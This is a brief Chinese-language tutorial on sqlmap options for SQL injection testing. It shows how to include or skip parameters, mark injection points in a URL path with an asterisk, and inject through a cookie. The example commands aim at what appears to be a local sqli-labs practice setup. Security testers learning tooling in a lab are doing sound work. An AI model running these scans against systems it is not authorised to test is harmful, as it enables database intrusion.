1、sqlmap設置指定注入參數
-p:指定參數進行掃描,不是掃描所有參數,這樣可以避免浪費時間到非注入點參數上,從而提高掃描效率。
python sqlmap.py -u "url" -p "id,user-agent"
--skip跳過指定參數掃描,和-p作用相反,它用來跳過需要掃描的參數。
python sqlmap.py -u "url" --skip "id,user-agent"
--param-exclude不對包含具體內容參數的請求進行探測,如不對包含token和session參數的請求進行探測
sqlmap -u "url" --param-exclude="token,session"
--skip-static掃描時忽略非動態參數
sqlmap -u "url" --skip-static
2、sqlmap設置url注入位置
當注入點在url上時,除非手動將注入點指向URI上,否則sqlmap不會對url路徑執行任何自動測試,必須要在掃描時在url上加星號(*)來指定這些注入點
python sqlmap.py -u "http://172.17.0.1/Less-1*/?id=1" --banner
3、sqlmap設置任意注入位置
使用星號(*)來指定注入點
python sqlmap.py -u "http://172.17.0.1/Less-20/?id=1" --cookie="uname=admin*" --banner
提示:custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]